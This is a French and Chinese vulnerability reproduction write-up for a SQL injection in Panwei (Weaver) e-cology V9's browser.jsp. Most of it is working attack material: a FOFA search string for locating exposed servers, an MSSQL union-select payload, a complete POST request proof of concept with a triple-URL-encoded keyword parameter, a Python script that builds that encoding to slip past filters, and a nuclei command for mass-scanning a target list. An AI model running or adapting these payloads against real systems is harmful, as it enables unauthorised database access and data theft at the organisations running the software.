Récurrence de la vulnérabilité Vulnérabilité d'injection SQL de Panmicro OA E-Cology V9 browser.jsp
Description de la vulnérabilité
La plate-forme de bureau mobile de nouvelle génération de Panwei, e-cology, fournit non seulement une plate-forme de travail collaboratif intégrée, mais réalise également progressivement l'ensemble du processus d'organisation électronique, en modifiant la manière traditionnelle des documents papier et des signatures physiques. Il existe une vulnérabilité d'injection SQL dans le browser.jsp de la plateforme Panwei OA E-Cology, à travers laquelle un attaquant peut obtenir les permissions de la base de données du serveur.
Récurrence de la vulnérabilité
fofa:app="泛微-协同商务系统"
1. Utilisez POC pour afficher la version actuelle de la base de données et renvoyer le résultat
1.MSSQL命令:
a' union select 1,''+(SELECT @@VERSION)+'
2.POC
POST /mobile/%20/plugin/browser.jsp HTTP/1.1
Host: {
{
Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 649
DNT: 1
Connection: close
Cookie: ecology_JSessionid=aaaDJa14QSGzJhpHl4Vsy; JSESSIONID=aaaDJa14QSGzJhpHl4Vsy; __randcode__=28dec942-50d2-486e-8661-3e613f71028a
Upgrade-Insecure-Requests: 1
isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
2. Écrivez et utilisez un petit script crypté avec trois caractères d'URL complets, comme suit
1命令:
python Fanwei_e-cology9_decode_three.py
2.脚本
import os
def main():
clearFlag = "y"
while(1):
if clearFlag == "y" or clearFlag == "Y":
os.system("cls")
clearFlag = ""
string = input("请输入需要转换的字符串 :")
type = input("(输入1:进行三次url全字符编码 ) :")
while(type != "1"):
type = input("操作类型输入错误(输入1:进行三次url全字符编码) :")
if type == "1" :
for i in range(3):
string = encode(string)
encode_string = string
print("编码结果为:"+encode_string+"\n")
#编码
def encode(string):
encode_string = ""
for char in string:
encode_char = hex(ord(char)).replace("0x","%")
encode_string += encode_char
return encode_string
main()
2. vérification des noyaux
nuclei.exe -t FanWeiOA_E-Cology9_browser_SQL.yaml -l subs.txt -stats